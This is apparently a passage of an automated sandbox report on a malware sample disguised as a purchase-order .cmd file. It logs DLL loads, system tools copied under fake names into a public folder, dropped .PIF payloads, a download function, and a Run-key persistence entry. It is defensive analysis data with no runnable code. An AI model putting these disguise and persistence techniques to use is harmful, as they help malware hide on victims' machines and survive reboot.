Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winhttpcom.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: webio.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: schannel.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: mskeyprotect.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ncrypt.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ncryptsslp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: dpapi.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: rstrtmgr.dll

Source: C:\Users\Public\xkn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Google Drive.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.10.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\xkn.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\fodhelper.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Jump to behavior

Source: Purchase Order is approved26042024.cmd

Static file information: File size 4050655 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
Source:	Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr

Data Obfuscation

Source: Yara match	File source: 36.2.Kpeyvroh.PIF.29a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.Kpeyvroh.PIF.29a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2420298425.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2505959580.0000000002841000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: alpha.exe.2.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress,

28_2_1B9F6A63

Source: alpha.exe.2.dr	Static PE information: section name: .didat
Source: kn.exe.23.dr	Static PE information: section name: .didat

Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE63668 push rsp; ret		25_2_00007FF67DE63669
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028932C0 push eax; ret		28_2_028932FC
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028B82F4 push 028B835Fh; ret		28_2_028B8357
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_0289631E push 0289637Bh; ret		28_2_02896373
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_02896320 push 0289637Bh; ret		28_2_02896373
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028B80AC push 028B8125h; ret		28_2_028B811D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028B81F8 push 028B8288h; ret		28_2_028B8280
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028B8144 push 028B81ECh; ret		28_2_028B81E4
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028966EA push 0289672Eh; ret		28_2_02896726
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028966EC push 0289672Eh; ret		28_2_02896726
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_0289C4A0 push ecx; mov dword ptr [esp], edx		28_2_0289C4A5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_0289D4D4 push 0289D500h; ret		28_2_0289D4F8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028B7428 push 028B7600h; ret		28_2_028B75F8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A9AD0 push 028A9B08h; ret		28_2_028A9B00
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028ACA48 push ecx; mov dword ptr [esp], edx		28_2_028ACA4D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_0289CB20 push 0289CCA6h; ret		28_2_0289CC9E
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A7840 push 028A78BDh; ret		28_2_028A78B5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_0289C857 push 0289CCA6h; ret		28_2_0289CC9E
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A687A push 028A6927h; ret		28_2_028A691F
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A687C push 028A6927h; ret		28_2_028A691F
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A2E94 push 028A2F0Ah; ret		28_2_028A2F02
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A2F9F push 028A2FEDh; ret		28_2_028A2FE5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A2FA0 push 028A2FEDh; ret		28_2_028A2FE5
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A7C1E push 028A7C58h; ret		28_2_028A7C50
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A7C20 push 028A7C58h; ret		28_2_028A7C50
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_028A5DB0 push ecx; mov dword ptr [esp], edx		28_2_028A5DB2
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA3E326 push esp; retf		28_2_1BA3E327
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA47106 push ecx; ret		28_2_1BA47119
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA24E56 push ecx; ret		28_2_1BA24E69
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA44658 push dword ptr [esp+ecx-75h]; iretd		28_2_1BA4465C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1BA3DD28 push esp; retf		28_2_1BA3DD30

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Kpeyvroh.PIF			Jump to dropped file
Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\sppsvc.pif			Jump to dropped file

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Code function: 36_2_21066EB0 ShellExecuteW,URLDownloadToFileW,

36_2_21066EB0

Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Kpeyvroh.PIF			Jump to dropped file
Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\sppsvc.pif			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe			Jump to dropped file

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe			Jump to dropped file

Boot Survival

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe			Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk			Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

28_2_1BA0AB0D

Source: C:\Users\Public\Libraries\sppsvc.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kpeyvroh
Source: C:\Users\Public\Libraries\sppsvc.pif	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kpeyvroh

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\Public\Libraries\sppsvc.pif

